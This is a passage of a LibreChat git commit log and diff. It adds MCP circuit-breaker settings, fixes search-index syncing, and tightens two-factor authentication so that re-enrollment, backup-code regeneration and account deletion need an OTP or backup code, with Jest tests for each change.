- auto-discovered path: same assertions for the branchless path
- root URL: asserts discovery is called only once when the server URL
  already has no path component

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

* refactor: use discoverWithOriginFallback in discoverMetadata too

Remove the inline duplicate of the origin-fallback logic from
`discoverMetadata` and replace it with a call to the shared
`discoverWithOriginFallback` helper, giving all three discovery
sites a single implementation.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

* test: use mock.calls + .href/.toString() for URL assertions

Replace brittle `toHaveBeenNthCalledWith(new URL(...))` comparisons
with `expect.any(URL)` matchers and explicit `.href`/`.toString()`
checks on the captured call args, consistent with the existing
mock.calls pattern used throughout handler.test.ts.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

---------

Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-03-10 15:04:35 -04:00
matt burnett
ad5c51f62b
⛈️ fix: MCP Reconnection Storm Prevention with Circuit Breaker, Backoff, and Tool Stubs (#12162)
* fix: MCP reconnection stability - circuit breaker, throttling, and cooldown retry

* Comment and logging cleanup

* fix broken tests
2026-03-10 14:21:36 -04:00
100 changed files with 9446 additions and 946 deletions

View file

@ -850,3 +850,24 @@ OPENWEATHER_API_KEY=
# Skip code challenge method validation (e.g., for AWS Cognito that supports S256 but doesn't advertise it) # Skip code challenge method validation (e.g., for AWS Cognito that supports S256 but doesn't advertise it)
# When set to true, forces S256 code challenge even if not advertised in .well-known/openid-configuration # When set to true, forces S256 code challenge even if not advertised in .well-known/openid-configuration
# MCP_SKIP_CODE_CHALLENGE_CHECK=false # MCP_SKIP_CODE_CHALLENGE_CHECK=false
# Circuit breaker: max connect/disconnect cycles before tripping (per server)
# MCP_CB_MAX_CYCLES=7
# Circuit breaker: sliding window (ms) for counting cycles
# MCP_CB_CYCLE_WINDOW_MS=45000
# Circuit breaker: cooldown (ms) after the cycle breaker trips
# MCP_CB_CYCLE_COOLDOWN_MS=15000
# Circuit breaker: max consecutive failed connection rounds before backoff
# MCP_CB_MAX_FAILED_ROUNDS=3
# Circuit breaker: sliding window (ms) for counting failed rounds
# MCP_CB_FAILED_WINDOW_MS=120000
# Circuit breaker: base backoff (ms) after failed round threshold is reached
# MCP_CB_BASE_BACKOFF_MS=30000
# Circuit breaker: max backoff cap (ms) for exponential backoff
# MCP_CB_MAX_BACKOFF_MS=300000

View file

@ -149,7 +149,15 @@ Multi-line imports count total character length across all lines. Consolidate va
- Run tests from their workspace directory: `cd api && npx jest <pattern>`, `cd packages/api && npx jest <pattern>`, etc. - Run tests from their workspace directory: `cd api && npx jest <pattern>`, `cd packages/api && npx jest <pattern>`, etc.
- Frontend tests: `__tests__` directories alongside components; use `test/layout-test-utils` for rendering. - Frontend tests: `__tests__` directories alongside components; use `test/layout-test-utils` for rendering.
- Cover loading, success, and error states for UI/data flows. - Cover loading, success, and error states for UI/data flows.
- Mock data-provider hooks and external dependencies.
### Philosophy
- **Real logic over mocks.** Exercise actual code paths with real dependencies. Mocking is a last resort.
- **Spies over mocks.** Assert that real functions are called with expected arguments and frequency without replacing underlying logic.
- **MongoDB**: use `mongodb-memory-server` for a real in-memory MongoDB instance. Test actual queries and schema validation, not mocked DB calls.
- **MCP**: use real `@modelcontextprotocol/sdk` exports for servers, transports, and tool definitions. Mirror real scenarios, don't stub SDK internals.
- Only mock what you cannot control: external HTTP APIs, rate-limited services, non-deterministic system calls.
- Heavy mocking is a code smell, not a testing strategy.
--- ---

View file

@ -1,7 +1,6 @@
const DALLE3 = require('../DALLE3'); const DALLE3 = require('../DALLE3');
const { ProxyAgent } = require('undici'); const { ProxyAgent } = require('undici');
jest.mock('tiktoken');
const processFileURL = jest.fn(); const processFileURL = jest.fn();
describe('DALLE3 Proxy Configuration', () => { describe('DALLE3 Proxy Configuration', () => {

View file

@ -14,15 +14,6 @@ jest.mock('@librechat/data-schemas', () => {
}; };
}); });
jest.mock('tiktoken', () => {
return {
encoding_for_model: jest.fn().mockReturnValue({
encode: jest.fn(),
decode: jest.fn(),
}),
};
});
const processFileURL = jest.fn(); const processFileURL = jest.fn();
const generate = jest.fn(); const generate = jest.fn();

View file

@ -236,8 +236,12 @@ async function performSync(flowManager, flowId, flowType) {
const messageCount = messageProgress.totalDocuments; const messageCount = messageProgress.totalDocuments;
const messagesIndexed = messageProgress.totalProcessed; const messagesIndexed = messageProgress.totalProcessed;
const unindexedMessages = messageCount - messagesIndexed; const unindexedMessages = messageCount - messagesIndexed;
const noneIndexed = messagesIndexed === 0 && unindexedMessages > 0;
if (settingsUpdated || unindexedMessages > syncThreshold) { if (settingsUpdated || noneIndexed || unindexedMessages > syncThreshold) {
if (noneIndexed && !settingsUpdated) {
logger.info('[indexSync] No messages marked as indexed, forcing full sync');
}
logger.info(`[indexSync] Starting message sync (${unindexedMessages} unindexed)`); logger.info(`[indexSync] Starting message sync (${unindexedMessages} unindexed)`);
await Message.syncWithMeili(); await Message.syncWithMeili();
messagesSync = true; messagesSync = true;
@ -261,9 +265,13 @@ async function performSync(flowManager, flowId, flowType) {
const convoCount = convoProgress.totalDocuments; const convoCount = convoProgress.totalDocuments;
const convosIndexed = convoProgress.totalProcessed; const convosIndexed = convoProgress.totalProcessed;
const unindexedConvos = convoCount - convosIndexed; const unindexedConvos = convoCount - convosIndexed;
if (settingsUpdated || unindexedConvos > syncThreshold) { const noneConvosIndexed = convosIndexed === 0 && unindexedConvos > 0;
if (settingsUpdated || noneConvosIndexed || unindexedConvos > syncThreshold) {
if (noneConvosIndexed && !settingsUpdated) {
logger.info('[indexSync] No conversations marked as indexed, forcing full sync');
}
logger.info(`[indexSync] Starting convos sync (${unindexedConvos} unindexed)`); logger.info(`[indexSync] Starting convos sync (${unindexedConvos} unindexed)`);
await Conversation.syncWithMeili(); await Conversation.syncWithMeili();
convosSync = true; convosSync = true;

View file

@ -462,4 +462,69 @@ describe('performSync() - syncThreshold logic', () => {
); );
expect(mockLogger.info).toHaveBeenCalledWith('[indexSync] Starting convos sync (50 unindexed)'); expect(mockLogger.info).toHaveBeenCalledWith('[indexSync] Starting convos sync (50 unindexed)');
}); });
test('forces sync when zero documents indexed (reset scenario) even if below threshold', async () => {
Message.getSyncProgress.mockResolvedValue({
totalProcessed: 0,
totalDocuments: 680,
isComplete: false,
});
Conversation.getSyncProgress.mockResolvedValue({
totalProcessed: 0,
totalDocuments: 76,
isComplete: false,
});
Message.syncWithMeili.mockResolvedValue(undefined);
Conversation.syncWithMeili.mockResolvedValue(undefined);
const indexSync = require('./indexSync');
await indexSync();
expect(Message.syncWithMeili).toHaveBeenCalledTimes(1);
expect(Conversation.syncWithMeili).toHaveBeenCalledTimes(1);
expect(mockLogger.info).toHaveBeenCalledWith(
'[indexSync] No messages marked as indexed, forcing full sync',
);
expect(mockLogger.info).toHaveBeenCalledWith(
'[indexSync] Starting message sync (680 unindexed)',
);
expect(mockLogger.info).toHaveBeenCalledWith(
'[indexSync] No conversations marked as indexed, forcing full sync',
);
expect(mockLogger.info).toHaveBeenCalledWith('[indexSync] Starting convos sync (76 unindexed)');
});
test('does NOT force sync when some documents already indexed and below threshold', async () => {
Message.getSyncProgress.mockResolvedValue({
totalProcessed: 630,
totalDocuments: 680,
isComplete: false,
});
Conversation.getSyncProgress.mockResolvedValue({
totalProcessed: 70,
totalDocuments: 76,
isComplete: false,
});
const indexSync = require('./indexSync');
await indexSync();
expect(Message.syncWithMeili).not.toHaveBeenCalled();
expect(Conversation.syncWithMeili).not.toHaveBeenCalled();
expect(mockLogger.info).not.toHaveBeenCalledWith(
'[indexSync] No messages marked as indexed, forcing full sync',
);
expect(mockLogger.info).not.toHaveBeenCalledWith(
'[indexSync] No conversations marked as indexed, forcing full sync',
);
expect(mockLogger.info).toHaveBeenCalledWith(
'[indexSync] 50 messages unindexed (below threshold: 1000, skipping)',
);
expect(mockLogger.info).toHaveBeenCalledWith(
'[indexSync] 6 convos unindexed (below threshold: 1000, skipping)',
);
});
}); });

View file

@ -9,7 +9,7 @@ module.exports = {
moduleNameMapper: { moduleNameMapper: {
'~/(.*)': '<rootDir>/$1', '~/(.*)': '<rootDir>/$1',
'~/data/auth.json': '<rootDir>/__mocks__/auth.mock.json', '~/data/auth.json': '<rootDir>/__mocks__/auth.mock.json',
'^openid-client/passport$': '<rootDir>/test/__mocks__/openid-client-passport.js', // Mock for the passport strategy part '^openid-client/passport$': '<rootDir>/test/__mocks__/openid-client-passport.js',
'^openid-client$': '<rootDir>/test/__mocks__/openid-client.js', '^openid-client$': '<rootDir>/test/__mocks__/openid-client.js',
}, },
transformIgnorePatterns: ['/node_modules/(?!(openid-client|oauth4webapi|jose)/).*/'], transformIgnorePatterns: ['/node_modules/(?!(openid-client|oauth4webapi|jose)/).*/'],

View file

@ -228,7 +228,7 @@ module.exports = {
}, },
], ],
}; };
} catch (err) { } catch (_err) {
logger.warn('[getConvosByCursor] Invalid cursor format, starting from beginning'); logger.warn('[getConvosByCursor] Invalid cursor format, starting from beginning');
} }
if (cursorFilter) { if (cursorFilter) {
@ -361,6 +361,7 @@ module.exports = {
const deleteMessagesResult = await deleteMessages({ const deleteMessagesResult = await deleteMessages({
conversationId: { $in: conversationIds }, conversationId: { $in: conversationIds },
user,
}); });
return { ...deleteConvoResult, messages: deleteMessagesResult }; return { ...deleteConvoResult, messages: deleteMessagesResult };

View file

@ -549,6 +549,7 @@ describe('Conversation Operations', () => {
expect(result.messages.deletedCount).toBe(5); expect(result.messages.deletedCount).toBe(5);
expect(deleteMessages).toHaveBeenCalledWith({ expect(deleteMessages).toHaveBeenCalledWith({
conversationId: { $in: [mockConversationData.conversationId] }, conversationId: { $in: [mockConversationData.conversationId] },
user: 'user123',
}); });
// Verify conversation was deleted // Verify conversation was deleted

View file

@ -51,6 +51,7 @@
"@modelcontextprotocol/sdk": "^1.27.1", "@modelcontextprotocol/sdk": "^1.27.1",
"@node-saml/passport-saml": "^5.1.0", "@node-saml/passport-saml": "^5.1.0",
"@smithy/node-http-handler": "^4.4.5", "@smithy/node-http-handler": "^4.4.5",
"ai-tokenizer": "^1.0.6",
"axios": "^1.13.5", "axios": "^1.13.5",
"bcryptjs": "^2.4.3", "bcryptjs": "^2.4.3",
"compression": "^1.8.1", "compression": "^1.8.1",
@ -66,7 +67,7 @@
"express-rate-limit": "^8.3.0", "express-rate-limit": "^8.3.0",
"express-session": "^1.18.2", "express-session": "^1.18.2",
"express-static-gzip": "^2.2.0", "express-static-gzip": "^2.2.0",
"file-type": "^18.7.0", "file-type": "^21.3.2",
"firebase": "^11.0.2", "firebase": "^11.0.2",
"form-data": "^4.0.4", "form-data": "^4.0.4",
"handlebars": "^4.7.7", "handlebars": "^4.7.7",
@ -106,10 +107,9 @@
"pdfjs-dist": "^5.4.624", "pdfjs-dist": "^5.4.624",
"rate-limit-redis": "^4.2.0", "rate-limit-redis": "^4.2.0",
"sharp": "^0.33.5", "sharp": "^0.33.5",
"tiktoken": "^1.0.15",
"traverse": "^0.6.7", "traverse": "^0.6.7",
"ua-parser-js": "^1.0.36", "ua-parser-js": "^1.0.36",
"undici": "^7.18.2", "undici": "^7.24.1",
"winston": "^3.11.0", "winston": "^3.11.0",
"winston-daily-rotate-file": "^5.0.0", "winston-daily-rotate-file": "^5.0.0",
"xlsx": "https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz", "xlsx": "https://cdn.sheetjs.com/xlsx-0.20.3/xlsx-0.20.3.tgz",

View file

@ -1,5 +1,6 @@
const { encryptV3, logger } = require('@librechat/data-schemas'); const { encryptV3, logger } = require('@librechat/data-schemas');
const { const {
verifyOTPOrBackupCode,
generateBackupCodes, generateBackupCodes,
generateTOTPSecret, generateTOTPSecret,
verifyBackupCode, verifyBackupCode,
@ -13,24 +14,42 @@ const safeAppTitle = (process.env.APP_TITLE || 'LibreChat').replace(/\s+/g, '');
/** /**
* Enable 2FA for the user by generating a new TOTP secret and backup codes. * Enable 2FA for the user by generating a new TOTP secret and backup codes.
* The secret is encrypted and stored, and 2FA is marked as disabled until confirmed. * The secret is encrypted and stored, and 2FA is marked as disabled until confirmed.
* If 2FA is already enabled, requires OTP or backup code verification to re-enroll.
*/ */
const enable2FA = async (req, res) => { const enable2FA = async (req, res) => {
try { try {
const userId = req.user.id; const userId = req.user.id;
const secret = generateTOTPSecret(); const existingUser = await getUserById(
const { plainCodes, codeObjects } = await generateBackupCodes(); userId,
'+totpSecret +backupCodes _id twoFactorEnabled email',
);
// Encrypt the secret with v3 encryption before saving. if (existingUser && existingUser.twoFactorEnabled) {
const encryptedSecret = encryptV3(secret); const { token, backupCode } = req.body;
const result = await verifyOTPOrBackupCode({
// Update the user record: store the secret & backup codes and set twoFactorEnabled to false. user: existingUser,
const user = await updateUser(userId, { token,
totpSecret: encryptedSecret, backupCode,
backupCodes: codeObjects, persistBackupUse: false,
twoFactorEnabled: false,
}); });
const otpauthUrl = `otpauth://totp/${safeAppTitle}:${user.email}?secret=${secret}&issuer=${safeAppTitle}`; if (!result.verified) {
const msg = result.message ?? 'TOTP token or backup code is required to re-enroll 2FA';
return res.status(result.status ?? 400).json({ message: msg });
}
}
const secret = generateTOTPSecret();
const { plainCodes, codeObjects } = await generateBackupCodes();
const encryptedSecret = encryptV3(secret);
const user = await updateUser(userId, {
pendingTotpSecret: encryptedSecret,
pendingBackupCodes: codeObjects,
});
const email = user.email || (existingUser && existingUser.email) || '';
const otpauthUrl = `otpauth://totp/${safeAppTitle}:${email}?secret=${secret}&issuer=${safeAppTitle}`;
return res.status(200).json({ otpauthUrl, backupCodes: plainCodes }); return res.status(200).json({ otpauthUrl, backupCodes: plainCodes });
} catch (err) { } catch (err) {
@ -46,13 +65,14 @@ const verify2FA = async (req, res) => {
try { try {
const userId = req.user.id; const userId = req.user.id;
const { token, backupCode } = req.body; const { token, backupCode } = req.body;
const user = await getUserById(userId, '_id totpSecret backupCodes'); const user = await getUserById(userId, '+totpSecret +pendingTotpSecret +backupCodes _id');
const secretSource = user?.pendingTotpSecret ?? user?.totpSecret;
if (!user || !user.totpSecret) { if (!user || !secretSource) {
return res.status(400).json({ message: '2FA not initiated' }); return res.status(400).json({ message: '2FA not initiated' });
} }
const secret = await getTOTPSecret(user.totpSecret); const secret = await getTOTPSecret(secretSource);
let isVerified = false; let isVerified = false;
if (token) { if (token) {
@ -78,15 +98,28 @@ const confirm2FA = async (req, res) => {
try { try {
const userId = req.user.id; const userId = req.user.id;
const { token } = req.body; const { token } = req.body;
const user = await getUserById(userId, '_id totpSecret'); const user = await getUserById(
userId,
'+totpSecret +pendingTotpSecret +pendingBackupCodes _id',
);
const secretSource = user?.pendingTotpSecret ?? user?.totpSecret;
if (!user || !user.totpSecret) { if (!user || !secretSource) {
return res.status(400).json({ message: '2FA not initiated' }); return res.status(400).json({ message: '2FA not initiated' });
} }
const secret = await getTOTPSecret(user.totpSecret); const secret = await getTOTPSecret(secretSource);
if (await verifyTOTP(secret, token)) { if (await verifyTOTP(secret, token)) {
await updateUser(userId, { twoFactorEnabled: true }); const update = {
totpSecret: user.pendingTotpSecret ?? user.totpSecret,
twoFactorEnabled: true,
pendingTotpSecret: null,
pendingBackupCodes: [],
};
if (user.pendingBackupCodes?.length) {
update.backupCodes = user.pendingBackupCodes;
}
await updateUser(userId, update);
return res.status(200).json(); return res.status(200).json();
} }
return res.status(400).json({ message: 'Invalid token.' }); return res.status(400).json({ message: 'Invalid token.' });
@ -104,31 +137,27 @@ const disable2FA = async (req, res) => {
try { try {
const userId = req.user.id; const userId = req.user.id;
const { token, backupCode } = req.body; const { token, backupCode } = req.body;
const user = await getUserById(userId, '_id totpSecret backupCodes'); const user = await getUserById(userId, '+totpSecret +backupCodes _id twoFactorEnabled');
if (!user || !user.totpSecret) { if (!user || !user.totpSecret) {
return res.status(400).json({ message: '2FA is not setup for this user' }); return res.status(400).json({ message: '2FA is not setup for this user' });
} }
if (user.twoFactorEnabled) { if (user.twoFactorEnabled) {
const secret = await getTOTPSecret(user.totpSecret); const result = await verifyOTPOrBackupCode({ user, token, backupCode });
let isVerified = false;
if (token) { if (!result.verified) {
isVerified = await verifyTOTP(secret, token); const msg = result.message ?? 'Either token or backup code is required to disable 2FA';
} else if (backupCode) { return res.status(result.status ?? 400).json({ message: msg });
isVerified = await verifyBackupCode({ user, backupCode });
} else {
return res
.status(400)
.json({ message: 'Either token or backup code is required to disable 2FA' });
}
if (!isVerified) {
return res.status(401).json({ message: 'Invalid token or backup code' });
} }
} }
await updateUser(userId, { totpSecret: null, backupCodes: [], twoFactorEnabled: false }); await updateUser(userId, {
totpSecret: null,
backupCodes: [],
twoFactorEnabled: false,
pendingTotpSecret: null,
pendingBackupCodes: [],
});
return res.status(200).json(); return res.status(200).json();
} catch (err) { } catch (err) {
logger.error('[disable2FA]', err); logger.error('[disable2FA]', err);
@ -138,10 +167,28 @@ const disable2FA = async (req, res) => {
/** /**
* Regenerate backup codes for the user. * Regenerate backup codes for the user.
* Requires OTP or backup code verification if 2FA is already enabled.
*/ */
const regenerateBackupCodes = async (req, res) => { const regenerateBackupCodes = async (req, res) => {
try { try {
const userId = req.user.id; const userId = req.user.id;
const user = await getUserById(userId, '+totpSecret +backupCodes _id twoFactorEnabled');
if (!user) {
return res.status(404).json({ message: 'User not found' });
}
if (user.twoFactorEnabled) {
const { token, backupCode } = req.body;
const result = await verifyOTPOrBackupCode({ user, token, backupCode });
if (!result.verified) {
const msg =
result.message ?? 'TOTP token or backup code is required to regenerate backup codes';
return res.status(result.status ?? 400).json({ message: msg });
}
}
const { plainCodes, codeObjects } = await generateBackupCodes(); const { plainCodes, codeObjects } = await generateBackupCodes();
await updateUser(userId, { backupCodes: codeObjects }); await updateUser(userId, { backupCodes: codeObjects });
return res.status(200).json({ return res.status(200).json({

View file

@ -14,6 +14,7 @@ const {
deleteMessages, deleteMessages,
deletePresets, deletePresets,
deleteUserKey, deleteUserKey,
getUserById,
deleteConvos, deleteConvos,
deleteFiles, deleteFiles,
updateUser, updateUser,
@ -34,6 +35,7 @@ const {
User, User,
} = require('~/db/models'); } = require('~/db/models');
const { updateUserPluginAuth, deleteUserPluginAuth } = require('~/server/services/PluginService'); const { updateUserPluginAuth, deleteUserPluginAuth } = require('~/server/services/PluginService');
const { verifyOTPOrBackupCode } = require('~/server/services/twoFactorService');
const { verifyEmail, resendVerificationEmail } = require('~/server/services/AuthService'); const { verifyEmail, resendVerificationEmail } = require('~/server/services/AuthService');
const { getMCPManager, getFlowStateManager, getMCPServersRegistry } = require('~/config'); const { getMCPManager, getFlowStateManager, getMCPServersRegistry } = require('~/config');
const { invalidateCachedTools } = require('~/server/services/Config/getCachedTools'); const { invalidateCachedTools } = require('~/server/services/Config/getCachedTools');
@ -241,6 +243,22 @@ const deleteUserController = async (req, res) => {
const { user } = req; const { user } = req;
try { try {
const existingUser = await getUserById(
user.id,
'+totpSecret +backupCodes _id twoFactorEnabled',
);
if (existingUser && existingUser.twoFactorEnabled) {
const { token, backupCode } = req.body;
const result = await verifyOTPOrBackupCode({ user: existingUser, token, backupCode });
if (!result.verified) {
const msg =
result.message ??
'TOTP token or backup code is required to delete account with 2FA enabled';
return res.status(result.status ?? 400).json({ message: msg });
}
}
await deleteMessages({ user: user.id }); // delete user messages await deleteMessages({ user: user.id }); // delete user messages
await deleteAllUserSessions({ userId: user.id }); // delete user sessions await deleteAllUserSessions({ userId: user.id }); // delete user sessions
await Transaction.deleteMany({ user: user.id }); // delete user transactions await Transaction.deleteMany({ user: user.id }); // delete user transactions

View file

@ -0,0 +1,264 @@
const mockGetUserById = jest.fn();
const mockUpdateUser = jest.fn();
const mockVerifyOTPOrBackupCode = jest.fn();
const mockGenerateTOTPSecret = jest.fn();
const mockGenerateBackupCodes = jest.fn();
const mockEncryptV3 = jest.fn();
jest.mock('@librechat/data-schemas', () => ({
encryptV3: (...args) => mockEncryptV3(...args),
logger: { error: jest.fn() },
}));
jest.mock('~/server/services/twoFactorService', () => ({
verifyOTPOrBackupCode: (...args) => mockVerifyOTPOrBackupCode(...args),
generateBackupCodes: (...args) => mockGenerateBackupCodes(...args),
generateTOTPSecret: (...args) => mockGenerateTOTPSecret(...args),
verifyBackupCode: jest.fn(),
getTOTPSecret: jest.fn(),
verifyTOTP: jest.fn(),
}));
jest.mock('~/models', () => ({
getUserById: (...args) => mockGetUserById(...args),
updateUser: (...args) => mockUpdateUser(...args),
}));
const { enable2FA, regenerateBackupCodes } = require('~/server/controllers/TwoFactorController');
function createRes() {
const res = {};
res.status = jest.fn().mockReturnValue(res);
res.json = jest.fn().mockReturnValue(res);
return res;
}
const PLAIN_CODES = ['code1', 'code2', 'code3'];
const CODE_OBJECTS = [
{ codeHash: 'h1', used: false, usedAt: null },
{ codeHash: 'h2', used: false, usedAt: null },
{ codeHash: 'h3', used: false, usedAt: null },
];
beforeEach(() => {
jest.clearAllMocks();
mockGenerateTOTPSecret.mockReturnValue('NEWSECRET');
mockGenerateBackupCodes.mockResolvedValue({ plainCodes: PLAIN_CODES, codeObjects: CODE_OBJECTS });
mockEncryptV3.mockReturnValue('encrypted-secret');
});
describe('enable2FA', () => {
it('allows first-time setup without token — writes to pending fields', async () => {
const req = { user: { id: 'user1' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue({ _id: 'user1', twoFactorEnabled: false, email: 'a@b.com' });
mockUpdateUser.mockResolvedValue({ email: 'a@b.com' });
await enable2FA(req, res);
expect(res.status).toHaveBeenCalledWith(200);
expect(res.json).toHaveBeenCalledWith(
expect.objectContaining({ otpauthUrl: expect.any(String), backupCodes: PLAIN_CODES }),
);
expect(mockVerifyOTPOrBackupCode).not.toHaveBeenCalled();
const updateCall = mockUpdateUser.mock.calls[0][1];
expect(updateCall).toHaveProperty('pendingTotpSecret', 'encrypted-secret');
expect(updateCall).toHaveProperty('pendingBackupCodes', CODE_OBJECTS);
expect(updateCall).not.toHaveProperty('twoFactorEnabled');
expect(updateCall).not.toHaveProperty('totpSecret');
expect(updateCall).not.toHaveProperty('backupCodes');
});
it('re-enrollment writes to pending fields, leaving live 2FA intact', async () => {
const req = { user: { id: 'user1' }, body: { token: '123456' } };
const res = createRes();
const existingUser = {
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
email: 'a@b.com',
};
mockGetUserById.mockResolvedValue(existingUser);
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
mockUpdateUser.mockResolvedValue({ email: 'a@b.com' });
await enable2FA(req, res);
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith({
user: existingUser,
token: '123456',
backupCode: undefined,
persistBackupUse: false,
});
expect(res.status).toHaveBeenCalledWith(200);
const updateCall = mockUpdateUser.mock.calls[0][1];
expect(updateCall).toHaveProperty('pendingTotpSecret', 'encrypted-secret');
expect(updateCall).toHaveProperty('pendingBackupCodes', CODE_OBJECTS);
expect(updateCall).not.toHaveProperty('twoFactorEnabled');
expect(updateCall).not.toHaveProperty('totpSecret');
});
it('allows re-enrollment with valid backup code (persistBackupUse: false)', async () => {
const req = { user: { id: 'user1' }, body: { backupCode: 'backup123' } };
const res = createRes();
const existingUser = {
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
email: 'a@b.com',
};
mockGetUserById.mockResolvedValue(existingUser);
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
mockUpdateUser.mockResolvedValue({ email: 'a@b.com' });
await enable2FA(req, res);
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalledWith(
expect.objectContaining({ persistBackupUse: false }),
);
expect(res.status).toHaveBeenCalledWith(200);
});
it('returns error when no token provided and 2FA is enabled', async () => {
const req = { user: { id: 'user1' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
});
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: false, status: 400 });
await enable2FA(req, res);
expect(res.status).toHaveBeenCalledWith(400);
expect(mockUpdateUser).not.toHaveBeenCalled();
});
it('returns 401 when invalid token provided and 2FA is enabled', async () => {
const req = { user: { id: 'user1' }, body: { token: 'wrong' } };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
});
mockVerifyOTPOrBackupCode.mockResolvedValue({
verified: false,
status: 401,
message: 'Invalid token or backup code',
});
await enable2FA(req, res);
expect(res.status).toHaveBeenCalledWith(401);
expect(res.json).toHaveBeenCalledWith({ message: 'Invalid token or backup code' });
expect(mockUpdateUser).not.toHaveBeenCalled();
});
});
describe('regenerateBackupCodes', () => {
it('returns 404 when user not found', async () => {
const req = { user: { id: 'user1' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue(null);
await regenerateBackupCodes(req, res);
expect(res.status).toHaveBeenCalledWith(404);
expect(res.json).toHaveBeenCalledWith({ message: 'User not found' });
});
it('requires OTP when 2FA is enabled', async () => {
const req = { user: { id: 'user1' }, body: { token: '123456' } };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
});
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
mockUpdateUser.mockResolvedValue({});
await regenerateBackupCodes(req, res);
expect(mockVerifyOTPOrBackupCode).toHaveBeenCalled();
expect(res.status).toHaveBeenCalledWith(200);
expect(res.json).toHaveBeenCalledWith({
backupCodes: PLAIN_CODES,
backupCodesHash: CODE_OBJECTS,
});
});
it('returns error when no token provided and 2FA is enabled', async () => {
const req = { user: { id: 'user1' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
});
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: false, status: 400 });
await regenerateBackupCodes(req, res);
expect(res.status).toHaveBeenCalledWith(400);
});
it('returns 401 when invalid token provided and 2FA is enabled', async () => {
const req = { user: { id: 'user1' }, body: { token: 'wrong' } };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
});
mockVerifyOTPOrBackupCode.mockResolvedValue({
verified: false,
status: 401,
message: 'Invalid token or backup code',
});
await regenerateBackupCodes(req, res);
expect(res.status).toHaveBeenCalledWith(401);
expect(res.json).toHaveBeenCalledWith({ message: 'Invalid token or backup code' });
});
it('includes backupCodesHash in response', async () => {
const req = { user: { id: 'user1' }, body: { token: '123456' } };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: true,
totpSecret: 'enc-secret',
});
mockVerifyOTPOrBackupCode.mockResolvedValue({ verified: true });
mockUpdateUser.mockResolvedValue({});
await regenerateBackupCodes(req, res);
const responseBody = res.json.mock.calls[0][0];
expect(responseBody).toHaveProperty('backupCodesHash', CODE_OBJECTS);
expect(responseBody).toHaveProperty('backupCodes', PLAIN_CODES);
});
it('allows regeneration without token when 2FA is not enabled', async () => {
const req = { user: { id: 'user1' }, body: {} };
const res = createRes();
mockGetUserById.mockResolvedValue({
_id: 'user1',
twoFactorEnabled: false,
});
mockUpdateUser.mockResolvedValue({});
await regenerateBackupCodes(req, res);
expect(mockVerifyOTPOrBackupCode).not.toHaveBeenCalled();
expect(res.status).toHaveBeenCalledWith(200);
expect(res.json).toHaveBeenCalledWith({
backupCodes: PLAIN_CODES,
backupCodesHash: CODE_OBJECTS,
});
});
});

View file

@ -0,0 +1,302 @@
const mockGetUserById = jest.fn();
const mockDeleteMessages = jest.fn();
const mockDeleteAllUserSessions = jest.fn();
const mockDeleteUserById = jest.fn();
const mockDeleteAllSharedLinks = jest.fn();
const mockDeletePresets = jest.fn();
const mockDeleteUserKey = jest.fn();
const mockDeleteConvos = jest.fn();
const mockDeleteFiles = jest.fn();
const mockGetFiles = jest.fn();
const mockUpdateUserPlugins = jest.fn();
const mockUpdateUser = jest.fn();
const mockFindToken = jest.fn();
const mockVerifyOTPOrBackupCode = jest.fn();
const mockDeleteUserPluginAuth = jest.fn();
const mockProcessDeleteRequest = jest.fn();
const mockDeleteToolCalls = jest.fn();
const mockDeleteUserAgents = jest.fn();
const mockDeleteUserPrompts = jest.fn();
jest.mock('@librechat/data-schemas', () => ({
logger: { error: jest.fn(), info: jest.fn() },
webSearchKeys: [],
}));
jest.mock('librechat-data-provider', () => ({
Tools: {},
CacheKeys: {},
Constants: { mcp_delimiter: '::', mcp_prefix: 'mcp_' },
FileSources: {},
}));
jest.mock('@librechat/api', () => ({
MCPOAuthHandler: {},
MCPTokenStorage: {},
normalizeHttpError: jest.fn(),
extractWebSearchEnvVars: jest.fn(),
}));
jest.mock('~/models', () => ({
deleteAllUserSessions: (...args) => mockDeleteAllUserSessions(...args),
deleteAllSharedLinks: (...args) => mockDeleteAllSharedLinks(...args),
updateUserPlugins: (...args) => mockUpdateUserPlugins(...args),
deleteUserById: (...args) => mockDeleteUserById(...args),
deleteMessages: (...args) => mockDeleteMessages(...args),
deletePresets: (...args) => mockDeletePresets(...args),
deleteUserKey: (...args) => mockDeleteUserKey(...args),
getUserById: (...args) => mockGetUserById(...args),
deleteConvos: (...args) => mockDeleteConvos(...args),
deleteFiles: (...args) => mockDeleteFiles(...args),
updateUser: (...args) => mockUpdateUser(...args),
findToken: (...args) => mockFindToken(...args),
getFiles: (...args) => mockGetFiles(...args),
}));
jest.mock('~/db/models', () => ({
ConversationTag: { deleteMany: jest.fn() },
AgentApiKey: { deleteMany: jest.fn() },
Transaction: { deleteMany: jest.fn() },
MemoryEntry: { deleteMany: jest.fn() },
Assistant: { deleteMany: jest.fn() },
AclEntry: { deleteMany: jest.fn() },
Balance: { deleteMany: jest.fn() },
Action: { deleteMany: jest.fn() },
